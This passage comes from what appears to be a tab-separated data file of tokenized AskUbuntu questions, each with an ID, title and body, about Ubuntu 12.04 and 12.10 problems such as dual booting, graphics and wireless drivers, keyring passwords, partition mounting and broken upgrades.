be working in order . i tried out many things . a few suggestions included replacing /var/lib/dpkg/status file with a copy from a working version . this i believe might correct the broken dependencies . however i do not have a working copy accessible at the moment ( not unless i create a bootable ) . i really need some way to roll back the system to the previous state ( backup does n't work either ) . any help is appreciated . thanks !
203968	it is possible to install dual boot ubuntu and windows 7 , using lvm ?	i am installing a fresh install of ubuntu 12.10 , and says than i can install ubuntu using the entire disk and creating lvm `` partitions '' , but my plan is to install windows 7 using one of those lvm partitions for dual boot , is this possible ? what is the right strategy to do this ?
203969	how to sudo visudo without a password , remove all prompts for password	websites tell me to use sudo when i have no password , usually tell me one of two things . it is bad security or use 'sudo visudo ' and the % admin all= ( all ) nopasswd : all line i would like to not have a password on anything despite the security risks . going with option 2 , i 'm trying to avoid getting prompted to enter a password at all on my account . so the problem with option 2 , is that sudo is still prompting for a password that does not exist . so i can not use sudo visudo in order to remove the need to enter a password for sudo , because it prompts for a password .
203977	minimize on click , unity launcher ubuntu 12.10	on ubuntu 12.04 i was able to minimize windows by clicking the icon on unity launcher with the help of this ppa : http : //www.webupd8.org/2012/05/how-to-get-dodge-windows-and-minimize.html now on ubuntu 12.10 this ppa doesnt work anymore.. what can i do to minimize from the icon ? will the ppa be updated or not ?
203979	wikipedia lens not working	hey guys i installed a wikipedia lens a while back and it worked great , but recently ive used it and it dosent work anymore . i open the lens and its just a blank screen im using ubuntu 12.04 ive tried re-installing and installing but no change , any ideas how to fix it please ?
203984	lubuntu 12.10 this kernel does not support a non-pae cpu	i have a dell inspiron 600m and i tried to install lubuntu 12.10 but encountered this message : this kernel does not support a non-pae cpu . is lubuntu supposed to support old hardware and computers ?
203985	wubi lubuntu 12.10 splash screen upon boot	i recently installed wubi with lubuntu on my windows pc . installation went very well . however , reboot did n't work so well . everytime i boot , i can get up to the splash screen with the dots , and then it just hangs . i 've tried nomodeset , and other stuff , but just does n't seem to work . please help me , and you might need to explain things in excess , as i 'm a complete newb . thank you ! spec : compaq presario cq43-310au 16 ghz 2 cpu 2gb ram amd radeon hd 6320 graphics
203986	how do i install ubuntu on the c drive without losing any data from the other drives ?	this is the first time i am installing linux . i have windows 7 on my c drive . i want to just format the c drive and then install linux on the c drive only . so how can i install it on only the one drive ( partition ) replacing windows 7 ? when installing it is using the complete hard disk space .
203990	where is `` apt-cache search '' ?	wish to search apt repositories with cli tool . did that in the past with : apt-cache search < search_term > do n't find apt-cache package : # apt-get install apt-cache reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apt-cache enabled all default repositories ( multiverse ) .
203994	i can not open google docs in libreoffice .	i 've just installed isync to use google drive on ubuntu 12.04 . its really nice , synchronizes very well . however , i 'm not able to open my doc files using libreoffice . the error is mainly this : the file filename is corrupt and therefore can not be opened . libreoffice can try to repair the file . when i click repair , its says read error . do you have any idea about this ?
203997	how do i remove nvidia drivers and revert to nouveau ( 12.04 ) ?	i 'd like to give the new nouveau drivers a try . when i try a ubuntu live distro , they work pretty flawlessly , but i do n't seem to be able to use them correctly on my installed system . what i do is remove nvidia drivers from the additional drivers utility and reboot , but what i get is no 3d acceleration and low resolution on my monitor . what am i doing wrong ? i wonder if i might have broken something when i messed up with grub trying to fix the infamous plymouth splash screen ... thanks for your support
203998	upgraded to 12.10 , and now most of my installed gnome shell extensions are `` outdated ''	i love the look of gnome shell , but the extensions are what make it usable for me . however , after the 12.10 upgrade , all but a few no longer work . is there a way to get them back manually , or must i wait until the extension authors make updates for quantal quetzal ? i 'm using gnome-shell 3.6.1 and installed the extensions using extensions.gnome.org .
204000	why is my openoffice.org presentation opening in libreoffice writer ?	i have project created in openoffice.org impress which is created in a local language . today when i open it what i could see is : when i open with the settings what i could see is writer is opening which is complete of the symbol `` # '' . how can i recover my project ?
204004	how to associate file types with sublime text 2 ?	i installed sublime text using this tutorial http : //www.technoreply.com/how-to-install-sublime-text-2-on-ubuntu-12-04-unity/ i want to associate sublime with css , js and php files . i added the following rows but still when double click on a php , js or css file , it does not open it at all ( not just with sublime ) : text/php=sublime.desktop text/x-php=sublime.desktop application/php=sublime.desktop application/x-php=sublime.desktop application/x-httpd-php=sublime.desktop application/x-httpd-php-source=sublime.desktop text/javascript=sublime.desktop text/css=sublime.desktop how should i proceed ?
204007	trying to extract field from html page	i 'm trying to extract one field to my local pc from an online form . i can save the page locally as text document and then search for the text but this seems rather cumbersome . is there another more efficient method ? my background is on macs but the company is trialling pc 's using ubuntu 12.04 , so please be tolerant of my relevant ignorance .
204008	how do i reinstall a .deb package without the file in 12.04	i have rosegarden installed via *.deb and i need to reinstall it . how do i do that in 12.04 ? help please !
204013	where did the negative compiz plugin go ?	after upgrading to quantal , i ca n't find the negative compiz plugin . why is that so ? i found that plugin pretty useful for reading scorching-bright pages . i see it 's still listed on the compiz plugins page . can someone help direct me on how to install the plugin ?
204021	a disk read error occurred on windows after installing ubuntu 12.10	i just installed ubuntu 12.10 , and i had windows 7 on my machine . now windows is giving me a disk read error occurred i ca n't use my windows anymore . how do i fix this problem ?
204027	overheating laptop even on low cpu usage	i am using ubuntu 12.10 latest release , but the problem is not really limited to this version . the laptop is equipped with ati 5400 series raedon graphics . i tried to install the fglrx driver , but it broke unity no panel and launcher . what should i do and what is the reason of this ? please comment for any more data that u need . sony vaio e series , i5 core processor , ubuntu 12.10 64 bit . default gpu drivers .
204033	where can i find comprehensive documentation on the various aspects of linux ?	whenever a problem pops up in my use of linux ( full time user for 6 years ) i start by googling . the simplest ( or most common ) issues will usually be cleared right away . if it 's not in one of those two categories the advise i find tend to be wrong , misguided , obsolete , and if you ask a question here on `` ask '' you risk being `` duplicated '' to some superficially similar question . some issues have haunted me for years until i suddenly hit on the actual developer 's documentation ( or equivalent ) which in a few lines explains how to solve my issue , the correct and consistent way . whenever that happens i 'm always kicking myself : why did n't i just go here to begin with ? and the obvious answer is : `` i had no idea this was what i was looking for '' . and for the issues that this has n't yet happened i 'm banging my head : `` this ought to be either straight forward or someone tell me it 's not doable '' so my question is : are there projects out there trying to collect or list this documentation in a searchable/browseable way . i know there are many very good `` if you want this do that '' tutorials on ubuntu but i 'm looking for actual documentation . that either are or could be collected in one place ( at least conceptually ) so that search for information could start in one place . i 'm fully aware this is a broad question but if you approach it as : does gnome have a comprehensive documentation project - where do i find it ? does ubuntu have a comprehensive documentation project - where do i find it ? for example : how exactly does the mime-type association work in ubuntu and in xubuntu ? how exactly are menus created ( in ubuntu : quicklists , xubuntu/gnome : the main menu ) how exactly does the rendering process work for compiz/x ? ( i 'm having this issue where windows randomly stops updating until somehow forced to resume ( i guess ) . so for instance where do i look for logs that may indicate the problem . how may i change randr or other settings that may influence this issue . so my point is to organize exact documentation or preferably to find projects that do this already . thanks ! if answers to this question get me started i 'm hoping to collect such a list .
204035	libreoffice does n't work with hud in 12.10	after upgrading to ubuntu 12.10 hud in libreoffice stopped to work and it searches in panel indicator instead . after running command unity -- repalce everything works fine , but it is really annoying to restart unity everytime you start libreoffice . is it a bug or can i fix it on my own ?
204049	no extra mouse buttons in 12.10 vmware guest	windows vmware workstation 9 host . no extra mouse buttons in 12.10 guest as verified with xev . this is working in 12.04 . neither setup use xorg.conf . no special setup needed to get extra mouse buttons working in 12.04 guest . any ideas on how to get extra mouse buttons in 12.10 vmware guest ?
204056	catalyst 12.8 does n't support kernel 3.5 , catalyst 12.9 does n't support my videocard	i know there is a some open source driver . what its status and can i enable it in ubuntu 12.10 ? anyway i got integrated radeon hd 4250 ( it 's a previous generation of amd chipsets , so i guess it 's not so old ) .
204057	ralink 3090 wireless connects but is slow and unstable on an ideapad s205	i am using the lenovo ideapad s205 and ubuntu 12.10 ( 32bit ) . the netbook has a built in ralink 3090 wireless card . the problem is : wifi does actually work , but network speeds are extremly slow and unstable . i am runnnig on a 32.000 dsl connection and i only get about 50kb/s with my wireless in ubuntu . to make things worse ; it slows down my entire internet router and network connection , forcing me to reset the router in order to bring this situation back to normal speeds again . this issue does not happen on windows 7 . my question : how can i fix this ? i read that the s205 @ default uses the open source wireless driver for my chipset . how can i download and safely install the prop . drivers for my wireless chipset ? thank you for your time and support - i appreciate it . oranges
204059	/etc/hosts file not being used before dns server query	i have upgraded to ubuntu 12.10 and i have made entries in /etc/hosts , but instead of looking into the hosts file , queries to my configured dns server are being made first . how can i make ubuntu query the /etc/hosts file first ? thanks .
204062	can not login to empathy after setting up google online account	on a new installation of 12.10 ubuntu , have added a google account for use with empathy . however , when attempting to connect , empathy displays `` google talk account requires authorisation '' . clicking on the icon opens online accounts but does not offer an option to perform any further authorisation . so far have checked the following : seahorse shows two entries for the google account , one of which lists the correct password , the other of which lists a seemingly random collection of characters separated by percentage symbols checked google account , ubuntu has permission to access : picasa web albums , profile information , google docs , google talk google account is not set up to use 2-step verification removed account and seahorse entries , set up from scratch if possible , will use non-alphanumeric characters in passwords , so tested with only alphanumeric password - no difference not going through a proxy activating empathy-debugger shows : wocky/-debug : 21/10/12 11:22:20.784214 : _end_element_ns : received stanza * failure xmlns='urn : ietf : params : xml : ns : xmpp-sasl' * not-authorized * missing-username xmlns='google : auth' wocky/-debug : 21/10/12 11:22:20.784320 : auth_failed : wocky-sasl-auth.c:274 : authentication failed ! : authentication failed : not-authorized gabbleauthentication-debug : 21/10/12 11:22:20.784421 : gabble_server_sasl_channel_fail ( server-sasl-channel.c:929 ) : auth failed : wocky_auth_error_failure ( # 6 ) : authentication failed : not-authorized gabbleconnection-debug : 21/10/12 11:22:20.784534 : connector_error_disconnect ( connection.c:1760 ) : interactive authentication error , reason 3 , dbus error org.freedesktop.telepathy.error.authenticationfailed so , it seems that seahorse has the correct password in place , and the google account is set up in such a way as to allow the application to work . that being the case , it makes no sense to be getting an authorisation error , unless there is something else that is n't immediately obvious . have checked for open bugs here : https : //bugs.launchpad.net/ubuntu/+source/empathy/+bugs https : //bugs.freedesktop.org/buglist.cgi ? quicksearch=telepathy however nothing that matched this exact problem jumped out - a lot of issues seem to be with 2-step verification ( but as mentioned earlier this has not been enabled ) . is there anything else to try at this point ?
204064	is it possible to *map* my windows ' desktop as my home desktop ?	i am using windows and ubuntu , is it possible to map windows ' desktop as my home desktop ( symlink or something like this ? ) ?
204065	how to run local shell script on remote server via ssh ?	i want to run a local shell script on a remote computer with ssh . how can i do this ?
204073	how to run script after resume and after unlocking screen	in ubuntu 12.04 lts , i would like to run scripts after resuming from suspend , and after unlocking my desktop . these need to run as my user , and with access to my $ display . in particular , i would like to restart nm-applet to work around bug 985028 show a custom notification using notify-send possibly other stuff when i get these working when i resume , scripts in /etc/pm/sleep.d/ are run , but they run as root , without knowledge of my screen and username . it might work if i would hard code my username and export the default display :0 in these scripts , but that feels like a very ugly hack . scripts in ~/.config/autostart/xyz.desktop , run after login , but they do n't run after merely unlocking the screen after resume . is there a way to run scripts after unlocking the screen after a resume ?
204085	upgrade broke in the middle - how to verify ?	i had to restart my laptop in the middle ( after couple of hours ) of upgrading from 12:04 to 12.10 . it seems like most of the things work ok , but some of the applications ( such as update manager ) , wo n't start . btw , i 'm using wubi installer , which worked amazingly till now ... is there a way to run some verification to check the system state ? and finish the upgrade ?
204087	what about ultrabook on ubuntu compatibility ?	device name : ultrabook zeus-m2 gaming notebook company : cyberpowerpc this device specifications : cpu : intel® core™ i5-3317u mobile processor 1.70 ghz 3m smart cache , max turbo freq . 2.60 ghz hdd : 120 gb intel 520 series ssd sata-iii 6.0gb/s - 550 mb/s read & 520 mb/s write ( single drive ) memory : 16gb ( 8gbx2 ) ddr3-1333 sodimm memory ( corsair or major brand ) motherboard : mobile intel hm77 express chipset mainboard sound : azalia with 24bit 2-channel ( spdif ) , mic sound system video : intel hd graphics 4000 directx 11 support integrated vide wireless 802.11b/g network card : built-in wireless 802.11b/g/n
204088	my wireless network is not listed [ hidden network ]	my home wireless network is listed as hidden network and every time i log in , i have to connect it manually . it is not listed in wireless connection list . i can only connect it with selecting `` connect to hidden wireless network '' option . i did n't have any problems with 12.04 . my laptop model is : dell inspiron n5110 os : 12.10 - 64 bit hardware information : sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 8 [ 8086:1c1e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm67 express chipset family lpc controller [ 8086:1c4b ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df5 ] ( rev a1 ) 01:00.1 audio device [ 0403 ] : nvidia corporation gf108 high definition audio controller [ 10de:0bea ] ( rev a1 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 09:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) 0b:00.0 usb controller [ 0c03 ] : texas instruments tusb73x0 superspeed usb 3.0 xhci host controller [ 104c:8241 ] ( rev 02 ) sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : 24 : b6 : fd:21 : eb:86 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:55 ioport : d000 ( size=256 ) memory : f3204000-f3204fff memory : f3200000-f3203fff *-network description : wireless interface product : centrino wireless-n 1030 vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 34 serial : 4c : eb:42:13:25 : e5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-17-generic firmware=18.168.6.1 ip=192.168.2.86 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:58 memory : f7a00000-f7a01fff lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 network controller : intel corporation centrino wireless-n 1030 ( rev 34 ) 0b:00.0 usb controller : texas instruments tusb73x0 superspeed usb 3.0 xhci host controller ( rev 02 )
204092	how can i change ( remove ) a seahorse password	i installed ubuntu 12.10 and entered a password in seahorse . i would like to remove the password of `` default '' but i get this error : gdbus.error : org.freedesktop.secret.error.nosuchobject : the collection does not exist is there a fix or a way to bypass modify the password ? thank you : )
204093	where can i find the 'build ' command needed to build the environment for edk 2 ?	i followed the step-by-step article here : uefi/efk2 . everything works nice until i need to actually build it . at the paragraph 'building mdemodulepkg module package ' the description says : just type build : bash $ build but my ubuntu 12.04.1 lts says : no command 'build ' found , did you mean : command 'xbuild ' from package 'mono-xbuild ' ( main ) command 'guild ' from package 'guile-2.0-libs ' ( universe ) command 'sbuild ' from package 'sbuild ' ( universe ) command 'bwild ' from package 'bacula-director-common ' ( main ) command 'buildd ' from package 'buildd ' ( universe ) build : command not found maybe someone knows where exactly i can find this mysterious command ?
204094	custom shortcut does't work !	i would like to have a shortcut for a command : sudo nautilus `` / '' i tried to set it in keyboard- > shortcuts- > custom shortcuts but it didnt work . i also created shell file with this command and put it ( sh myfile.sh ) there but it also didnt work . when i set there only nautilus it works but this is not what i want . does anyone know how can i create shortcuts for a custom command like this ?
204095	ca n't boot windows xp after intalling ubuntu 12.04	here 's the situation . i installed ubuntu using the along side option . everything went ok . when i restarted i went strait to ubuntu and it worked beautifully . when i restarted and tried to enter windows , the loading screen appeared , and after 3 -4 seconds it restarted again . no error , no cursor waiting , no nothing . i looked on the internet for help and found several resources . i tried first lilo since it seemes that many people had they 're issues solved with it . after lilo neither ubuntu nor windows would start . i installed and used bootinfoscript . the results.txt can be seen below https : //www.dropbox.com/sh/r3luoa672qe73uq/mob13hhnib after that i looked at boot-repair i did as instructed here ca n't boot xp after ubuntu installation , how to fix ? , meaning i redid the mbr of my ubuntu install using a generic mbr . with no success . the results of boot-repair are in the first link . now when i restart my computer i do n't even get the windows loading screen , just missing operating system missing operation system operating system not found that 's it . i did not use the fixboot or fixmbr option because i do n't have a windows cd cabable of seeing my hdd drivers . the usual xp windows setup tells me that i have no hdd . please help , i do n't know what to to next . this is my first time with ubuntu or any linux os .
204098	error building main guest additions module while installing virtualbox guest additions	i have installed ubuntu 12.10 guest on ubuntu 12.04 host using virtualbox . everything is from repository and no direct install . when i install the guest additions , the below error is shown in the console . before running the command i mapped the vboxguestadditions.iso in the guest . the closest i could get is this article which says to install the latest version of virtualbox ( not the one from the repository ) . is there any alternate solution ? sudo ./vboxlinuxadditions.run verifying archive integrity ... all good . uncompressing virtualbox 4.1.12 guest additions for linux ... ... ... virtualbox guest additions installer removing installed version 4.1.12 of virtualbox guest additions ... removing existing virtualbox dkms kernel modules ... done . removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason . building the main guest additions module ... fail ! ( look at /var/log/vboxadd-install.log to find out what went wrong ) doing non-kernel setup of the guest additions ... done . installing the window system drivers warning : unknown version of the x window system installed . not installing x window system drivers . installing modules ... done . installing graphics libraries and desktop services components ... done .
204103	firefox 16 wo n't start from the gnome shell in 12.10	i 've just upgraded to 12.10 and firefox does n't work properly . when i start it from the gnome shell nothing happens , however system monitor shows me two processes called 'firefox ' , the last one of which has memory field as n/a . but when i just type in terminal firefox it starts and there is only one entity of firefox in the system monitor .
204105	ubuntu 12.10 transparent window title bar	i would like to set transparency to window title bar in ubuntu 12.10 . i used settings in gconf-editor- > apps- > gwd and set transparency there . this works in ubuntu 12.04 , but in 12.10 does not for me . is there any possibility to change it ? i am also wonder if there is any tweak editor like myunity or unsettings which obviously doesnt work .
204110	how do i change the clock position on panel in gnome 3.6 ?	after the upgrade to 12.10 the clock on the gnome panel is now on the far right instead of the middle of the panel : how do i fix it ?
204112	upgrade to 12.10 button not on update manager	i 'm following the instructions on how to upgrade from 12.04 to 12.10 . it says to launch the update manager , cick the check button to check for new updates . and press the upgrade button after i 've downloaded any 12.04 updates . but this upgrade button never appears . is there a hardware limitation to 12.10 that i 'm now aware of ? i 've got a lenovo t400 thinkpad with 2 gib ram and and intel core2 duo cpu @ 2.53ghz .
204116	`` could n't change keyring password '' error in seahorse	when i try to change the password of every password keyring in ubuntu 12.10 i receive this error message : could n't change keyring password gdbus.error : org.freedesktop.secret.error.nosuchobject : the collection does not exist the software is : seahorse 3.6.0 this is something strange , i never had this problem with previous ubuntu releases . can you help me ? my intention is to have a blank password keyring .
204117	need help getting serial data using octave	i 'm trying to use octave and the instrument control package to read in serial data through the usb port . right now i 'm just sending test data through the port . zeros and ones . i 'm getting correct data through the usb when i use screen : screen /dev/ttyusb1 i get strange data when i try to use octave though . i think i 'm doing something wrong . here 's an example . i think i should be getting 0 or 1 from srl_read : > pkg load all > s1 = serial ( `` /dev/ttyusb1 '' , 9600 ) s1 = 3 > srl_read ( s1,1 ) ans = 49
204119	mount issue in ubuntu 12.10	i 'm having issue with latest ubuntu 12.10 . let me make it more clear . i 'm having the following partitions in my laptop . device boot start end blocks id system /dev/sda1 2048 39997439 19997696 83 linux /dev/sda2 * 40001850 81947564 20972857+ 83 linux /dev/sda3 81947565 123877214 20964825 83 linux /dev/sda4 123887614 976773119 426442753 5 extended /dev/sda5 123887616 333602815 104857600 83 linux /dev/sda6 333604864 543320063 104857600 83 linux /dev/sda7 543322112 753037311 104857600 83 linux /dev/sda8 753039360 976773119 111866880 83 linux i have also two users named `` ms '' and abc . here ms is for administrative tasks and abc for my friends . when i mount any drive under `` abc '' user , i can not access it under my other user `` ms '' . same as in the case with `` ms '' user . i found possible reason behind the issue . when i mount any drive under `` abc '' user , ubuntu will try to mount it under `` /media/abc/volume_name '' instead of `` /media/volume_name '' . same as in the case with `` ms '' user . # df -h filesystem size used avail use % mounted on /dev/sda1 19g 11g 7.5g 59 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 599m 896k 598m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.5g 620k 1.5g 1 % /run/shm none 100m 92k 100m 1 % /run/user /dev/sda2 20g 172m 19g 1 % /media/abc/test /dev/sdb1 466g 353g 114g 76 % /media/abc/f088f74288f7063e /dev/sdb2 466g 318g 148g 69 % /media/abc/new volume /dev/sda5 99g 94g 323m 100 % /media/abc/songs /dev/sda6 99g 31g 63g 34 % /media/ms/films here , you can see that `` test '' was mounted under `` /media/abc/test '' . when i try to access the already mounted partition named '/media/abc/test '' in my `` ms '' session i 'm getting the following error . how to fix this error ? is it a bug ? is there any way to fix this without modifying the underlying file-system structure ?
204120	ubuntu one stuck on `` file sync starting '' due to ipcerror on ubuntu 12.04	note to editors/moderators : this issue has not been solved ( or rather explained ) in a way that is intelligible and useful to a non-linux-geek in anyone of the postings concering this issue ( i read them all ) . here is my problem : file sync stopped due to ipc error ubuntone worked fine on my ubuntu 12.04 system for a week ( i am an ubuntu beginner ) . thereafter `` filesync is starting '' showed with no further response for hours . i tried repeatedly . at times the following error message appeared ( not exact wording ) : '' sorry , an error occurred and ubuntuone needs to close '' with '' details '' : `` ipcerror '' ( no further explanation of the error . ) please provide guidelines that do n't require linux coding knowledge to understand and handle , and please use plain simple english and not an idioma that requires knowledge of linux abbreviations etc .
204122	trying to install pandoc via cabal install fails	since the pandoc package in the repository is outdated , i would like to install it via cabal-install . i ran cabal update , and then cabal install pandoc which fails with : cabal : could n't read cabal file `` pandoc/1.9.4.4/pandoc.cabal '' this might be relevant : cabal -- version cabal-install version 0.10.2 using version 1.10.1.0 of the cabal library my machine is running oneiric .
204125	ubuntu desktop slightly too big on hdmi tv	when i connect my panasonic viera tv ( 720p ) via hdmi to my notebook the desktop is cut on the tv . i tried different resolutions but no matter which it 's always cut on each side ... i had the same problem on windows 7 but managed to correct it with the resolution of 1184x666 . when i try this with xrandr ( i manually added and activated this mode ) on ubuntu ( 12.10 , also on 12.04 ) it just gives me a blank screen . i found a couple of posts that deal with the same problem and tried out the suggested solutions but nothing works . in the meanwhile i think it 's the problem of the tv . but then if it works on windows , why not on ubuntu ? details for tv : panasonic lcd tv tx-l32x10e i would be very greatful for further suggestions ! thx , hannes
204126	ubuntu 12.10 installation not initializing while trying to install from usb	i have downloaded ubuntu 12.10 , i used livelinux sotware to install it from usb , after creating the usb key i reboot by pc , i got the ubuntu desktop screen and a window asking me either to try the os or install , i choose install followed the onscreen instruction , i oped to install ubuntu within windows 7 option and clicked continue , but when the system restarts , i am getting the same screen asking me whether to try ubuntu or install it . can someone help me out with that ? ?
204127	catalyst forgets monitor settings after reboot or log out in 12.10	i have a samsung monitor connected to my ati radeon graphic card via hdmi . by default the screen has a black border around , but i can disable it in the catalyst menu to get full screen . ( there is a scalebar that i have to set to the highest value . ) my problem is that every time i turn off and on my computer it changes back and i have to set it up again . it is really annoying . is there any way to make this setting permanent ? notes : 1 . i open catalyst with admin rights . 2 . when i open the catalyst settings menu , it looks like that it keeps my settings , because the scalebar stays at the highest point , but still it does n't scale up my screen until i move back and forth the scale bar to the same point update : as a new user i can not answer this protected question , nut i have found a solution , i also had this same problem . solution is described at : https : //help.ubuntu.com/community/binarydriverhowto/ati if you experience underscan when outputting video to an hdtv , this may resolve the issue : sudo aticonfig -- set-pcs-val=mcil , digitalhdtvdefaultunderscan,0 sudo reboot this sets the default underscan setting to false . i did it and it finally solved the problem . this may not be the standard way to answer the question , but i think in this case it 's more important that mate knows how to fix it until amd fixes its ccc finally .
204129	where could i find drivers of ati radeon 2400 hd ?	where could i find drivers of ati radeon 2400 hd ubuntu 12.10 x64 , for laptop ?
204133	how to delete a folder from hard drive via xubuntu on usb ?	i 'm using http : //xubuntu.org/ 12.10 on my memorystick , and i need to delete a folder from my c drive in my computer . the folder is in a simple place : c/windows/program files/ '' folder name '' . how can i delete this folder via terminal or something . that folder is the reason i cant mount the rest of c drive.. thanks !
204134	has some queries in python	has some queries in python 1 ) is python language is easy or difficult 2 ) what are the tools required for the python programming
204135	nvidia geforce 630m and intel hd graphic 3000	i 've got laptop with : :- core i5 ( 2nd generation ) 2450m 6 gb ram ddr3 mobile intel hm77 express nvidia geforce 630m 2 gb ddr intel hd graphic 3000 can anyone help me to installing correct driver for standard dedicated + integrated in ubuntu 12.10 i really appreciate help .
204136	how to enable login password in ubuntu 12.10	i install multiple operating systems in virtualbox . i have installed ubuntu 11.04 , 11.10 , 12.10 too in it . while installation of ubuntu 12.10 , i turned on the auto-login but now i want ubuntu to ask for password , like my earlier ubuntu installations . can you tell me the procedure of disabling this auto auto-login feature ? thanks
204138	where to find quickly app dev tool documentation	i want to build an gui app using quickly and i would like to get a deeper understanding of how a gui application is structured , do you know any documentation that might help me ?
204139	dual desktop setup / extended . mouse gets stuck at edges if it does not have same resolution	if i have two monitors running in extended mode that have different pixel heights the mouse gets stuck at the edge between the two monitors if the mouse is below or above the edge of the second monitor . i can see that it makes sense to have the mouse travel at the same pixel during the transition . for me it would make more sense to let it travel at the same relative height . so that on the transition if i was 10 % away from the top corner , i end up 10 % away from the top corner after switching the mouse pointer from screen a to screen b . is there a way to achieve this ?
204140	how to mount ntfs partitions on startup ?	i now this question has been asked a million times but this is a bit different , now i need to know on how to mount it on ubuntu 12.10 i been using pysdm for a long time but on ubuntu 12.10 it does not work sadly , i installed arios-automount and it mounted partitions on start up but problem i have with it , on start up it launches all the partition window so can anyone tell me a good mount manager for ubuntu 12.10 with graphical user interface thank you for your time
204145	`` one or more partitions are busy on /dev/sd* '' what to do ?	i recently bought a 4gb usb memory , serioux , data traveller . today i wrote on it linux mint 13 cinnamon edition , and now i want to format it . i have tried to go to disk utility , select it and press `` format drive '' , with the `` do n't partititon '' option , but when i click format , and again , it gives me this message : one or more partitions are busy on /dev/sdc i have already tried to safely remove it and rebooted the system n times , but it is not working .
204154	ubuntu on asus n56v laptop	i 've just installed ubuntu 12.04 on my new asus n56v laptop . i used to option to install it alogside with windows , and dedicated ~90gb to it , but everytime i boot my computer , it loads windows straight ahead , i do n't really have the option to select between the both os . i 've heard that it is some problem realated with uefi , or somehing like that , but the problem is that i do n't really understand a lot of linux ... thanks in advance for your help .
